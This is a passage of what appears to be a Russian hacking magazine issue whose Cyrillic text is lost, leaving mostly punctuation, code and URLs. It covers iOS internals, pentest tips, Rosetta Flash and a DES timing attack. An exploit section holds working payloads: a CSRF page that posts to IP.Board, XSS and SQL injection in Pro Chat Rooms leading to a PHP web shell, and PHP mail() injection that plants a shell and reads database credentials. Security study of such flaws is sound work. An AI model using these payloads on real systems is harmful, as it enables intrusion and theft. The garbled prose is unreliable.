Mac OS X iOS
Mach-O,

,

.

Darwin Mac OS / iOS,


(, / , , ). , ,
, API

Mac OS iOS ,
( AddressBook) OpenGL (GLKit). Cocoa API,

INFO

, API Mac OS iOS

.


API,
jailbreak-

.

,
. iOS Cocoa Touch .
. iOS.
AssetsLibrary,
, CoreBlueTooth, , iAd,
.
, Apple iOS Mac
OS , , ,
CoreMedia, iOS.

/System/Library/Frameworks/.
,
(bundle), ( ), ,
API, ( dylib) .
.
, , , , , .
iOS-
iOS 7 . , iOS 6,
, iOS 6.

SPRINGBOARD
, .
, , SpringBoard ( iOS), ( ). ,
(
, Quartz Compositor), .
SpringBoard , ,
,
,
( iOS 7). -


,
. OS X,
-
(Finder, Dashboard, LaunchPad ), iOS
,
,
SpringBoard.
iOS,
/Applications, SpringBoard
/System/Library/CoreServices/.
,
/System/Library/SpringBoardPlugins/. , , , NowPlayingArtLockScreen.
lockbundle,
,
IncomingCall.servicebundle, .
iOS 6 SpringBoard :
BackBoard, , ( HAL). BackBoard
, , , ,
, ,
.
SpringBoard BackBoard iOS, , - ,

.
Android, ,
, (

).

,
, 1988
4-2-2-2-4, . GUID ,

(sandbox).

SANDBOX

INFO

iOS
.
. UNIX chroot,
TrustedBSD MAC,
,
.
sandbox
:
.
Media Library Media/DCIM/, Media/Photos/, Library/AddressBook/, Library/Keyboard/ Library/Preferences/.
(
).
(
Cocoa API ).
( Jetsam).

iOS
XNU Winocm kernel,


Darwin,
ARM.

WWW
Darwin,
:
puredarwin.org

. iOS
()
, iTunes.
, , . ,
, Mach-O.

/Applications/. iOS
;
. , iTunes, ,
/var/mobile/Applications/ ,

sandbox-
( ) container
. , , ,
. ( MobileMail),
, ,
Library/. SpringBoard,
.
,
, , AFC, , .


Darwin :
gnu-darwin.sf.net

iBoot:
goo.gl/l1SsNU

[Figure: sandbox call flow, steps 1 to 10. Labels: sandboxd, sandboxed process, user mode, kernel mode, system calls and Mach traps, mandatory access control (MAC) layer, additional policy modules, sandbox, AppleMatch.]


sandbox-
/System/Library/Sandbox/Profiles/*
, Scheme.
, , entitlement. ,
, ( ).
, , :

# cat -tv /Applications/MobileSafari.app/MobileSafari | tail -31 | more
.
( ) , sandbox,
.
iTunes
(: , iTunes) iOS
.

.
Apple, . Sandbox . Safari ,
.

Apple. ,
jailbreak sandbox (,
).

iOS
. , ,
. Android iOS

. API, ,
.
API iOS 4 ( ) .
( iOS 7) Background API
:
;
VoIP-;
;
push-;
;
;
( Bluetooth);
( iOS 7).

INFO

iOS
HFSX.
HFS+ Mac OS X

.

INFO
launchd

SystemD,
Red Hat Linux-.

INFO
XNU
Mach.


,
, Android. Apple
,
,
, Wi-Fi-
.

1. Boot ROM.
,
. LLB.
2. Low Level Bootloader (LLB).
LLB, , iBoot,
. . LLB NAND-

.
3. iBoot. . , NAND-,
. iBoot UART,
, COM- USB ( USB UART).
4. ,
launchd.
5. Launchd, iOS Mac OS X,
,
/ (, backupd, configd,
locationd), , ,
SpringBoard. iOS Mac OS X launchd /bin/init UNIX,
.
6. SpringBoard. !
chain
of trust,
.
LLB, iBoot , ,
.
.
Boot ROM, 2014 iBoot.
iPhone,
iBoot (Recovery), iOS, iTunes.
OTA- , DFU (Device Firmware
Upgrade), Boot
ROM : iBSS iBEC.
, LLB iBoot, , .

iOS

Recovery Mode

, NeXTSTEP
,
.
Google, , Android
iOS, : Android iOS.
, ,
.

Recovery

LLB

INFO

root iOS alpine.

iPhone.

Boot ROM

DFU?

iBoot

Kernel

OS Upgrade
(iTunes)
iBSS

iBEC

Update

EASY
HACK


GreenDog ,
Digital Security
agrrrdog@gmail.com,
twitter.com/antyurin

WARNING

. ,

,
.

. - . .
( ), .
, , . ,
, .


, , . -, .
: ,
Burp Comparer.
SNMPv3. . , SNMPv3 , . -


, ,
SNMPv3 ,
, MIB,
.
- Python
Patator (goo.gl/3C0hbQ)
Ruby (goo.gl/PSD69c).



. , .
.
.
OpenSSH SSH- . (4, 5 6) time-based

. .
,
,
30 .
. ,
, OpenSSH
.
, , ,
,
. , ,
(
-), .
,
OWA Outlook Web App. .
-,
- .
.
, , ,
OSUETA (goo.gl/3gk51d) , , . 113
.
. , . OWA
, ( CPU).
. , , ,
, ,
/ OpenSSH, .
.

, :
- . Heartbleed. , . NSA , , :). ,
, OpenSSL,
- . ,
, ()
- HTTPS FTP SSL, .
, , , , , ,
,
, , . SSL. SSL:
SSL-,
( HTTPS). , SSL-
. , SMTP.
25- ; ; EHLO,
SSL-, STARTTLS ( , , ) SSL-.
SSL- .
, MITM (
,
),
SSL, .
SSL-, ,
( HTTP 80, HTTPS 443). , SMTP, , MTA, ( MTA), STARTTLS
.
. (
), , Heartbleed, ,
, -

. SMTP, POP3, FTP, ,


SSL-, ,
STARTTLS. -
Heartbleed.
. , Nmap
Heartbleed SSL-, . , Metasploit (auxiliary/scanner/ssl/openssl_heartbleed) GitHub (goo.gl/sgwaa3)
STARTTLS.

STARTTLS EHLO- SSL

SMTP- Heartbleed. :)


DR ID

SSL. , , ,
SSL , ,
. , . , ( , ),
. ,
.

() . , . , , . ,
,
( ).
, , ... . , , , , , . , ? , . SSL- www.google.com
HTTPS-. ,
, ( ,
).
,
- ... , (
) , ( - ),
.
, SSL pinning ( certificate
pinning). :
,
. -

, . , ,
, .
(
) . ,
. - , , / . ,
.
, , ,
. , iOS Windows Phone
SSL pinning App Store, Market.
SSL- - .
? ( , , ). . .
. 2012
Black Hat USA iSEC Partners,
(Justine Osborne) (Alban Diquet), Android-SSL-TrustKiller (goo.gl/p43AYi) iOS SSL Kill Switch (goo.gl/
wR8baO).
. / Java Debug Wire Protocol / MobileSubstrate API, SSL,
. ,
certificate pinning,
, . ,
. (goo.gl/9Wr5YA) : goo.gl/Dm3DN5.
, :)

.
,

, IP,
. , ,
. , IP-
FTP-.
. SSRF.
, .
, , - : PORT IP ,
.
ftp-bounce
Nmap.

? :) , FTP Port Bounce ( 1997 ),


, .
, FTP (
). 21- ,
( -),
PORT IP- .
. (21- )
( ),
. , .


, PRNG
(Pseudorandom number generator), .
, ,
.
,
. - ,
- .
. ,
- , , , , . ,
, :).
, . PRNG .
. , ?
Positive Hack Days (goo.gl/4xuICf)
(, ) , java.util.Random ( PRNG)
. , .
, Jenkins ( -). MD5- IP, , , java.util.
Random ( ).
.
, , .
, , PRNG,
. , (. Entropy ). : HTTP -, TCP/
IP- ( . ). , .
PRNG, , , - ,
IP-.
, .
, , , , .
.
. , .
. ,
.
2008 Debian, OpenSSL.
2006 , Debian Valgrind Purify.
() OpenSSL. ,
OpenSSL
(. ).

( NSA :))

.
, , PID .
1 32 768. ,
sslabs.com

. , ( ) . SSL man in the middle


-
SSH-
. , , ,
, -. RSA-, DSA- exploit-db.com (exploit-db.com),
SSH (goo.gl/ryWxCv) , SSL
www.ssllabs.com (+ -).
,
. , .
!


,
b.ryutin@tzor.ru,
@dukebarman


- . , -
PHP- Zend Framework.

RF- I

RD

CVSSv2: N/A
: 3 2014
: Piotr S (@evil_xorb)
CVE: N/A
IPB
, CSRF-
.
,
. ,
- , . ()
GET- , -

,
.
.
:

http://community.invisionpower.com/index.php?sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2lvbnBvd2VyLmNvbS9mb3J1bS5waHA/aWQ9MjMzNQ==
, Base64-. :

http://community.invisionpower.com/forum.php?id=23
. -



, .

http://community.invisionpower.com.your_domain.pl
, , :

Location: http://community.invisionpower.com.xorb.pl/exploit.html?forcePrint=1&_k=161cc4d2d5503fdb483979f9c164b4d3
$_GET _k .
. .

EXPLOIT
:

http://forum.victim_site.com.your_domain.pl
exploit.html :

<html>
<head>
<script>
onload = function ipboard(){var token = window.location.hash.split('=');
document.getElementById('tokens').value=token;};
function fo(){document.ipboards.submit();};
setTimeout("fo()",1500);
</script>
</head>
<body>
<form action="http://forum.victim_site.com/index.php?" method="POST" id="ipboards" name="ipboards" enctype="multipart/form-data">
<input type="hidden" name="TopicTitle" value="hacked!" />
<input type="hidden" name="isRte" value="0" />
<input type="hidden" name="noSmilies" value="0" />
<input type="hidden" name="Post" value="IPboard 3.x 0day" />
<input type="hidden" name="ipsTags" value="&#13;" />
<input type="hidden" name="enableemo" value="yes"/>
<input type="hidden" name="enablesig" value="yes" />
<input type="hidden" name="st" value="0" />
<input type="hidden" name="app" value="forums" />
<input type="hidden" name="module" value="post" />
<input type="hidden" name="section" value="post" />
<input type="hidden" name="do" value="new&#95;post&#95;do" />
<input type="hidden" name="s" value="x" />
<input type="hidden" name="p" value="0" />
<input type="hidden" name="t" value="&#13;" />
<input type="hidden" name="f" value="2" />
<input type="hidden" name="parent&#95;id" value="0" />
<input type="hidden" name="attach&#95;post&#95;key" value="x" />
<input type="hidden" id="tokens" name="auth&#95;key" value="7xxx3e9" />
<input type="hidden" name="removeattachid" value="0" />
<input type="hidden" name="dosubmit" value="Post&#32;New&#32;Topic" />
<input type="submit" value="Submit request" />
</form>
<h1><b>IP Board 3.X PoC<br/>wait... ;)</b></h1>
</body>
</html>



IP.Board

,
:

http://community.invisionpower.com/index.php?sharelink=print;aHR0cDovL2ZvcnVtLnZpY3RpbV9zaXRlLmNvbS55b3VyX2Rvbpbi5jb20vZXhwbG9pdC5od1sIw==
Base64- ...print; :

http://forum.victim_site.com.your_domain.com/exploit.html#
.
(bit.ly/1lPCOm3) .

TARGETS
IP.Board 3.x3.4.6.

SOLUTION
.


R
R
0
CVSSv2: N/A
: 5 2014
: Mike Manzotti
CVE: N/A
Text
Chat Room Audio/Video Chat Room (v8.2.0)
Prochatrooms.com. PHP AJAX
.
(, ), IRC.
.

EXPLOIT
1. XSS. ,
, JavaScript-. :

WARNING


. ,

,
.


POST: http://<WEBSITE>/prochatrooms/
profiles/index.php?id=1
Content-Disposition: form-data;name=
"uploadedfile"; filename="nopic333.jpg"
Content-Type: image/jpeg
<script>alert(document.cookie)</script>
32- HTML- imgID:

<input type="hidden" name="imgID" value="798ae9b06cd900b95ed5a60e02419d4b">
/profiles/
uploads, :

http://<WEBSITE>/prochatrooms/profiles/uploads/
798ae9b06cd900b95ed5a60e02419d4b
2. XSS. edit :

http://<WEBSITE>/prochatrooms/profiles/
index.php?id=1&edit="><script>
alert(document.cookie)</script>
3. SQL-. , /includes/
functions.php.

...
$params = array(
    'password' => md5($password),
    'email' => makeSafe($email),
    'id' => $id);
$query = "UPDATE prochatrooms_users SET email = '".$email."', password='".md5($password)."' WHERE id = '".$id."'";
...
$query = "UPDATE prochatrooms_users SET email = '".$email."' WHERE id = '".$id."'";
...
$query = "UPDATE prochatrooms_users SET active = '".$offlineTime."', online = '0' WHERE username = '".makeSafe($toname)."'";#
, - . makeSafe. htmlspecialchars():


POST http://<WEBSITE>/prochatrooms/profiles/
index.php?id=1
Content-Disposition: form-data; name=
"profileEmail" mm () 1dn eu', email=
(select load_file('/var/www/prochatrooms/includes/
db.php')) where id ='1';#
4. .
XSS SQL-, -
.
:

POST: http://<WEBSITE>/prochatrooms/profiles/
index.php?id=1
Content-Disposition: form-data; name=
"uploadedfile"; filename="m.jpg"
Content-Type: application/octet-stream
<?php system($_GET[cmd]);?>
, :

<input type="hidden" name="imgID" value="82d0635538da4eac42da25f8f95f8c45">
:

POST http://<WEBSITE>/prochatrooms/profiles/
index.php?id=1
Content-Disposition: form-data; name=
"profileEmail" mm () 1dn eu' where id ='1';
SELECT load_file('/var/www/prochatroms/profiles/
uploads/82d0635538da4eac42da25f8f95f8c45')
INTO OUTFILE '/var/www/prochatrooms/profiles/
uploads/s.php';#
,

http://<WEBSITE>/prochatrooms/profiles/uploads/
s.php?cmd=id:uid=33(www-data) gid=33(www-data)
groups=33(www-data)
Google, ,
:

intitle:"Powered by Pro Chat Rooms"

TARGETS
Pro Chat Rooms 8.2.0.

...
function makeSafe($data)
{
$data = htmlspecialchars($data);
return $data;
}
...
SQL-, email,
, , MD5- .

POST http://<WEBSITE>/prochatrooms/profiles/
index.php?id=1
Content-Disposition: form-data; name=
"profileEmail" mm () 1dn eu', email=
(select adminLogin from prochatrooms_config)
where id ='1';
, . :

SOLUTION
.



-
I
CVSSv2: N/A
: 8 2014
: geoffrey
CVE: N/A
, -, (bit.
ly/1u38llY). . PHP- mail().
. :
1. To.
2. Subject.
3. Message.


:
1. Headers (Optional).
2. Parameters (Optional).
.
. PHP ,
sendmail, . PHP
4.2.3.
sendmail.
:
-O option=value
option.
.
-Cfile
.
Sendmail (set-user-ID or set-groupID), .
-X logfile

.
:
QueueDirectory=queuedir
.
:

$to = 'a@b.com';
$subject = 's';
$message = 'm';
$headers = '';
$options = '-arg val';
mail($to, $subject, $message, $headers, $options);

gdb. php
:

(gdb) file php
Reading symbols from /opt/php-5.3.0/sapi/cli/php...done.
(gdb) set args -r 'mail("a@b.com", "s", "m", "", "-arg val");'

EXPLOIT
:

$to = 'a@b.c';
$subject = '<?php system($_GET["cmd"]); ?>';
$message = '';
$headers = '';
$options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php';
http://localhost/rce.php :

11226 <<< To: a@b.c
11226 <<< Subject:
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<
,
, , :

> cat rce.php
11226 <<< To: a@b.c
11226 <<< Subject: <?php system($_GET["cmd"]); ?>
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<
http://localhost/rce.php?cmd=ls%20-la:

11226 <<< To: a@b.c
11226 <<< Subject: total 20
drwxrwxrwx 2 * * 4096 Sep 3 01:25 .
drwxr-xr-x 4 *** www-data 4096 Sep 2 23:53 ..
-rw-r--r-- 1 * * 92 Sep 3 01:12 config.php
-rwxrwxrwx 1 * * 206 Sep 3 01:25 mailexploit.php
-rw-r--r-- 1 www-data www-data 176 Sep 3 01:27 rce.php
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<
11226 <<<
11226 <<<
11226 <<< [EOF]
.
-C:

(gdb) b mail.c:291
Breakpoint 1 at 0x83f39b2: file /opt/php-5.3.0/ext/standard/mail.c, line 291.
(gdb) r
Starting program: /opt/php-5.3.0/sapi/cli/php -r 'mail("a@b.com", "s", "m", "","-arg val");'
[Thread debugging using libthread_db enabled]
Breakpoint 1, php_mail (to=0x8b5c2b8 "a@b.com", subject=0x8b5c2ec "s", message=0x8b5be2c "m", headers=0x8b5be9c "", extra_cmd=0x8b5c31c "-arg val")
    at /opt/php-5.3.0/ext/standard/mail.c:291
291         sendmail = popen(sendmail_cmd, "w");
:

(gdb) p sendmail_path
$1 = 0x89af284 "/usr/sbin/sendmail -t -i"
(gdb) p sendmail_cmd
$2 = 0x8b5c35c "/usr/sbin/sendmail -t -i -arg val"
-arg val -
;ls -al - ,
.
.

$options = '-C/var/www/html/config.php -OQueueDirectory=/tmp -X/var/www/html/evil.php';
mail($to, $subject, $message, $headers, $options);
evil.php :

11124 >>> /var/www/html/config.php: line 1: unknown configuration line "<?php"
11124 >>> /var/www/html/config.php: line 3: unknown configuration line "dbuser = 'someuser';"
11124 >>> /var/www/html/config.php: line 4: unknown configuration line "dbpass = 'somepass';"
11124 >>> /var/www/html/config.php: line 5: unknown configuration line "dbhost = 'localhost';"
11124 >>> /var/www/html/config.php: line 6: unknown configuration line "dbname = 'mydb';"
11124 >>> No local mailer defined

, , : .
:
1.
Shared ,
.



, .
2.

. -

-f,
:

-f\'${PHPFROM}\' -OQueueDirectory=/tmp -X /
var/www/uploads/back.php
PHPFROM:

"<?if(isset(\$_SERVERHTTP_SHELL ())
eval(\$_SERVER[HTTP_SHELL]);/*@*/?>"
,
.

TARGETS
-
:

grep -r -n --include "*.php" "mail(.*,.*,.*,.*,.*)" *



PHP- Zend (bit.ly/1tIq8jD), , , 2011 .

SOLUTION
mail()
. PHP 5.4 ,
safemode, ,
.


SDLC...

SDLC, , , ( .
. ), . SDLC
, Agile,
.

SDLC


white hat, security, ZeroNights
.
Principal Security
Engineer Nokia,
HERE.
alexey.sintsov@here.com

SDLC (security development life cycle)


, , . ,
.

Microsoft, SDLC.
, , ,
: .
, -
,
. ,
SDLC, (www.microsoft.
com/security/sdl/default.aspx).

AGILE
, Microsoft
,
Waterflow.
, 2006 , (
, ).
, Agile. ,
, -

, ...
, ,
SDLC. , SDLC , , , .
,
,
:
,
, , ,

, . ,
SDLC. Agile
, , , ,
,
(, , Backlog ),
.

SDLC, S.
,
()
,
,
. ,
Agile -


SDLC.

, , .
.


,
, , . , HERE
embedded- , iPhone, - ,
,
! . , ,
. , ,
.

SDLC?
, SDLC
, MS,
. , S ( ,
) SDLC
. . ,
.
!
,
: ,
,
. + , ,
.

()
- .
. ,

, , ? , ,
.
. ,
-
, .
() ,
- .
.
,
. .
-
( ,
,
). ,
,
. , . :
-HackQuest/CTF
, , , , , , .
,
. , Agile

SDLC MS

, .
,
, . : .
, . , ,
.
, , -, .
! ,
(, , )
, (
,
). , :
.
, +
: , ,
SSL ( ,
), / (,
XSS/SQLi
) . ,
,
, : , , CSRF, , :). ,
,
- , -, - .
, ,

:). , Agile ,
.
, , ,
-, , /. , .
, -
- ,
. ,
,
.
-,
. ,
RedTeam ,
( ),



;). ,
, , , , , ,

, .
feedback .


, - ,
, .
, , . ,
, ,
, , .
SDLC ,
. : ,
, , .
:
. .
!

SDLC MS, Agile


Michele Spagnuolo
@mikispag
miki.it

JSONP
ROSETTA
FLASH

Rosetta Flash
(CVE-2014-4671, CVE-2014-5333) ,
SWF-, ,

JSONP. CSRF-
, JSONP,
Same Origin Policy.

, - . ,

JSONP
( JSON-!)
.
Google, YouTube, Twitter, LinkedIn, Yahoo!, eBay,
Mail.ru, Flickr, Baidu, Instagram, Tumblr Olark
JSONP. - Ruby on
Rails MediaWiki .

marina_ua@shutterstock.com



:
1. Flash SWF- GET- POST-,
cookie, , ,
crossdomain.xml.
SWF-
: SWF, ,
, ,
.
2. JSONP callback URL-. JSONP
callback
[a-zA-Z_\.],
,
, .
3. SWF- <object>
Flash, Flash-.
Rosetta Flash zlib, ADLER32 SWF- ,
- ,
JSONP callback
, Flash- .


Rosetta Flash . ,
,
,
, (bit.ly/1D5dyxC).

. 1. Rosetta Flash


SWF ,
zlib,
-

. 2. SWF
. 3. Flash-

FLASH-
Flash- (magic bytes FWS ), zlib (CWS)
LZMA (ZWS). ,
. 2.
, -
( Version
FileLength). , , .

. 4.
zlib

ZLIB
zlib- zlib -. , zlib-,
DEFLATE, ,
. (bit.ly/YGzHD3),
zlib- :
  0   1
+---+---+=====================+---+---+---+---+
|CMF|FLG|...compressed data...|    ADLER32    |
+---+---+=====================+---+---+---+---+

WWW

bit. ly/1AHhWPB Rosetta
Flash


ActionScript.
1

, ,
CMF FLG. , CMF (Compression Method and flags),
: , CM [0:3],
, , CINFO [4:7], ,
.
, FLG (Flags), :
[0:4] FCHECK;
5 FDICT;
[6:7] FLEVEL.
FCHECK (Check bits for CMF and FLG)
, CMF FLG, 16-
, MSB- (CMF*256+FLG),
31.
FDICT (Preset dictionary) ,
FLG- zlib- DICT. , FDICT 0 (-
DICT ).
FLEVEL (Compression level) ; , , 3 (11 ), .
. , 4


. 5.
zlib
. 6.
ADLER32

CMF + CINFO + FLG (


FCHECK CMF FLG,
; FDICT, 0, , 3).
, , 0x68 0x43 = hC Rosetta Flash
. 0x6843 = 26691 mod 31 = 0,
FCHECK.

. 7.

. 8.
DEFLATE-

ADLER32
SWF-
(. . 2), ,
zlib- SWF ,
- ,
. Rosetta Flash ,
ADLER32
SWF-,
[a-zA-Z0-9_\.].
ADLER32 , S1 S2, .
. 6.
S1 S2 ( -). :
,
SWF? , SWF :
. .
? Sleds + Deltas
(. . 7).
, ( 0xfe, 0xff ,
) , ,
S1,
-.
. , S1,
. NULL-,
S2,
S2.


INFO
Rosetta Flash
Pwnie Award
Internet Bug Bounty.

SWF-

-

-
zlib,

,
[a-zA-Z0-9_\.]
. Rosetta .
8


.

,
,

, . , (
16, 00) , .
. 9.

,
, . SWF-.
ActionScript 2.0 ( open source mtasc):

class X {
    static var app : X;

    function X(mc) {
        if (_root.url) {
            var r:LoadVars = new LoadVars();
            r.onData = function(src:String) {
                if (_root.exfiltrate) {
                    var w:LoadVars = new LoadVars();
                    w.x = src;
                    w.sendAndLoad(_root.exfiltrate, w, "POST");
                }
            }
            r.load(_root.url, r, "GET");
        }
    }

    static function main(mc) {
        app = new X(mc);
    }
}
SWF-
Rosetta Flash. - ( ,
) . 10.
HTML-
crossdomain.xml , , .
, FlashVars (. . 11):
url URL , , GET- cookies ;
exfiltrate URL,
POST x, .


.
ADOBE
Google ( ),
Adobe PSIRT. ,
(bit.ly/1pYS027) ,
Twitter, eBay, Tumblr Instagram.
Adobe ,
- Flash Player 14 (14.0.0.125)
(14.0.0.145).
APSB14-17 Adobe
SWF-:
, , Flash Player
API c JSONP callback.
, . , Flash Player, , Rosetta Flash:
1. 8 .
JSONP , SWF
.
2. Flash 4096 .
, JSONP, SWF .
3. .
, JSONP, [^0-9A-Za-z\._]. ,
$ JSONP callback,
, jQuery JS.
, $ ALLOWED_
CHARACTERS Rosetta Flash JSONP callback (
), .
, Rosetta Flash SWF 4 ,
ADLER32 . , , JSONP .
, ,
: (.
, (, SWF ,
callback SWF, Adobe ( ( callback).
: S1, , ( Sled + Delta
.
Adobe , ,
.
. Adobe 12 2014 . :
1. Content-Type: application/x-shockwave-flash . , .
2. 8 . - >=0x80
(non-ASCII), .
3. SWF-, 4096
. non-ASCII,
.
4. SWF-
.


, JSONP , , , sandbox-.
HTTP- Content-Disposition:
attachment;
filename=f.txt, . -

, Flash Player
SWF ( 10.2).

//:

response.body =
"//#{param[:callback]}".

10

, Google,
Facebook GitHub .
,

X-Content-Type-Options:
nosniff.
JSONP , application/x-shockwave-flash (, application/javascript
application/json), Flash
Player SWF.

11

JSONP
Flash-,
, Same Origin
Policy -.

,
. Rosetta Flash
,
.

, Rosetta ,
,
.
:
Flash-,
, ,
, ,
;
,
Content-Type (
, , Content-Type);
, API,
- callback.

. 9. Rosetta Flash
. 10. SWF Rosetta Flash
. 11.
SWF-

,
ascii-zip,
Rosetta,
Google
Security Team, Adobe PSIRT HackerOne.



roman.korkikian@yandex.com


, .

. ,
.
,
( ), . , .

erandamx@shutterstock.com




.

.
, , ,
.
,
.
. ,
,


.
,
, . ,
,
. 1. - DES

,

.
,
,

. ,
,
.

, ,

, .

, ,
, (goo.gl/GEszDD).

. ,
, .
, , , ( - ?), , , .
,
-

. 2.

.
,
(
, ?),
.

(hardware attacks),
.
,
, .
,
, ,
. ,
,
,
(Side Channel Attacks).
,
,
.

.
, , ,
. ,
?

, , , ,

.
,
,
.

(Fault attacks).

: ,
,
-.


DES, C++ (
. 1, ). , ,
,
. ,
,
.



, (Timing
attack)
DES.
dvd.xakep.ru,
(
. 2), .

:
. 3. 1

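#include <stdint.h>

/* Extract bit i of x (bit 0 is the least significant bit). */
#define GETBIT(x,i) (((x)>>(i)) & 0x1)

/* DES P permutation table (bit positions are 1-based, counted from the MSB). */
uint8_t p_tab[32] = {16,7,20,21,29,12,28,17,1,15,23,26,5,18,31,10,
                     2,8,24,14,32,27,3,9,19,13,30,6,22,11,4,25};

uint32_t DES_P(const uint32_t var)
{
    int iBit = 0;
    uint32_t res = 0x0, one = 0x1;
    for (iBit = 0; iBit < 32; iBit++)
        /* The OR below runs only for set bits, so the run time depends on var. */
        if (GETBIT(var, 32 - p_tab[iBit]) == 1)
            res |= one << (31 - iBit);
    return res;
}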

:
res |= one<<(31-iBit),
(: ),
var 1. var,
, , ,
,
. , ,
.
, , .

,
,

:
1=0x3030456 89 BC EF,
2=0xFE CB 98 6540303,
.
, ,
,

ES_P
.
,
,


.
?

,
var , :
,
DES_P,
var
: a*( W(var)),
,

, res
= one<<(31-iBit), W(var)
,
var, 1.
,
16 ;
,
, .

, t
= a*( W(var))
T. a T , ,
, . t . ,
var .
, , ,
:
W(var)
. ,
W(var) . , ,
, .
(. 3).
,
1
2 ( ). ,
,


.
var ,


1.
, 2.
,

1.
, 1
.
, ,
, .
, -


:
res |= one<<(31-iBit),
(:
),
var 1



,
.

. 4.



, ,

.
,
, ,


. (b, c) 0
(
b, c). b

. ( -
c). ?
, ,
:

void

ame(int * b, int * )
static int
= 0;

. 6.


int
= 1000;
srand((unsigned int)rdtsc());
if ( ==0)
= 1 rand() 100;
* b =
( * *rand()) ;
* = ( * *rand()) ;
void uess()
int b, , i, nTries = 100000;
double avg1 = 0.0, avg2 = 0.0;
for (i=0; i<nTries; i )
ame( b, c);
avg1 = b;
avg2 = c;
printf(" f n",
roundf((avg1-avg2)/numTries));
, 1
100, b 0
999, ,
! (
b, ) 100 (,
), .
b
, . . ,
, (
b,
), , .
, .
,


,
. ,
(x)
x
.

,
b c
(b) (c),
b c , (b)
(c)

, ,
(b)
(c)
.

.
. ,
,
W(var):

,


(x) x

,
.
5% . ,
.
? ,
(
). -,
,
. -, , , ( ,
), - .
,
.
DES,
:
,
ES_P,
var: a*( W(var)); -
, W(var) ;
,
;
(t), 0: . , ,
, .
, t = a*( W(var))
T
(t). , . 4, .
, W(var)
254,
327
!

(t) = (a*( W(var))


T
(t)) =
(a*( W(var)))
(T)
( (t)) = a*( W(var))
T
( (t))

, ,
,

,
( (t)) .
. 100 DES,
100 .
:
1=0x3030456 89 BC EF,
2=0xFE CB 98 6540303,
3=0x2030456 89 BC EF,
4=0x3030456 89 BC E . ,

1, 2, 3, 4 , . 5.
.

. 7.

. 5. 2


. 8.


(
),
( , W(var) 234,276 ().
(. 6), , Y
.


. 6? ( 2, 3, 4) , 1 .
-
, , ( (t)) . , ,
1,
. , 1 (
). ,
.
.
, ,

:
, - .
, , ,
pcc(x,y) ( Wiki bit.ly/W WzQ3n).
. , (t) = a*( W(var))

T
( (t)) y = a*x
b,
x ,
y .
. 7.
1
, .
, 1.
.
,
,
( ).
, , ,
1 . , ,
, .
,
.


,
6 . 6 , 64 ( ). 6
,
, , . ?
, , 6 :


,
ES_P, :
4 var
a* W(var 1,1:4 ) (6 4 var);
var 4 a*(
W(var :,1:32 ));
;
(t).

, t = a* W(var 1,1:4 )
a*(
W(var :,1:32 ))
(t).
6 4 var.
32 R E() 48 ,
48 . R , .
(!) 6 , 6
Sbox.
, 32- var,
.
,
W(var 1,1:4 ) ,
:
(t) = (a* W(var 1,1:4 ))
(a*( W(var :,1:32 )))
( )
( (t)) = a* W(var 1,1:4 )
(a*(
W(var :,1:32 )))
( (t)).
W(var 1,1:4 )

W(var :,1:32 ) ( , W(var 1,1:4 ) ,
,
W(var :,1:32 ) ), (a*(
W(var :,1:32 ))) ( , (
W(var :,1:32 ))
254), ,
( (t))!
var
var 1,1:4 = Sbox E( ) 1,1:6 xor
1,1:6 ,
E( ) 1,1:6 6 R
E();
1,1:6
6 ; Sbox Sbox.
var 1,1:4 : (t)
= a* W(Sbox E( ) 1,1:6
xor 1,1:6 )
(a*(
W(var :,1:32 )))
( (t)).

(a*(
W(var :,1:32 ))),
( (t)) ,
.
,


(a*(
W(var :,1:32 )))
( (t))
const: (t) = a* W(Sbox E( ) 1,1:6 xor
1,1:6 )
const.
, 6 -

W(Sbox E( ) 1,1:6 xor


1,1:6 ),
. :

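For each key = 0:63
    For each i = 1:N
        // take the i-th plaintext
        P = plaintext(i)
        /* the initial permutation splits it into the halves L and R */
        L, R = IP(P)
        /* Hamming weight of the predicted 4 bits of var for this key guess */
        hw_var[i] = HammingWeight(Sbox1(E(R)[0:5] XOR key))
    EndFor
    /* correlate the N measured times with the N predicted weights */
    pcc(key) = ComputePearsonCorrelation(t, hw_var)
EndFor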
C++ ( dvd.xakep.ru), . 8.
. 000010=2 ,
, , ,
. , , .
6 ,
, .

. ,
.
,

.


000010=2
,
,
, ,

,

//,

.
, ,
, ,
. stay tuned,
.


WARNING
! ! , !

X-TOOLS

D1g1
Digital Security
@evdokimovds


: Simone
Margaritelli & Co
: Android
URL: www.dsploit.net

: iSECPartners
: Windows
URL: https://github.com/iSECPartners/DIBF

: Decalage
: Windows
URL: https://bitbucket.org/decalage/balbuzard/wiki/balbuzard

ANDROID

IOCTL TOOL SUITE

BALBUZARD

dSploit Android-
Android. ,
!
:
Wi-Fi ;
;
NVD;
login-;
TCP- UDP-;
HTTPS/SSL (SSL Stripping + HTTPS
Redirection);
MITM Realtime Network Stats;
MITM Multi Protocol Password Sniffing;
MITM HTTP/HTTPS Session Hijacking;
MITM HTTP/HTTPS Hijacked Session File
Persistance;
MITM HTTP/HTTPS Realtime Manipulation.

IOCTL ,
.
DIBF Dynamic Ioctl Brute-Forcer (and fuzzers).
, .
-, IOCTL-, ,

. ,
, .
-, DIBF dumb:
pure random fuzzer;
sliding DWORD fuzzer;
asynchronous fuzzer.

Balbuzard ,
, IP-, URL, EXE-
.
: / , -,
hex- . ,
URL, IP-,
. , .
,
. ,
.
:
;
IP-,
email-, URL, EXE-,
,
;
Yara- ;
CSV-;
batch- /;
.

, :
DroidSheep, NetSpoof zAnti. RouterPWN ,
traceroute, ,
MITM ,
YouTube JavaScript. ARM Android 2.3
root- BusyBox.

.
,
. hex-

.


VIPROY

: Fatih Ozavci
: Windows/Linux
URL: www.viproy.com
Viproy Voip- ,

VoIP-.
SIP Skinny, IP
. , Viproy
.


Metasploit .

:
SIP Register;
SIP Invite;
SIP Message;
SIP Negotiate;
SIP Options;
SIP Subscribe;
SIP Enumerate;
SIP Brute Force;
SIP Trust Hacking;
SIP UDP Amplification DoS;
SIP Proxy Bounce;

: Joshua J.
Drake
: Linux
URL: https://github.com/jduck/android-cluster-toolkit

Skinny Register;
Skinny Call;
Skinny Call Forward;
VOSS Call Forwarder
(September 2014);
VOSS Speed Dial Manipulator
(September 2014);
MITM Proxy TCP;
MITM Proxy UDP;

: Aidan
Marlin, Nikos Laleas
: Windows/
Linux
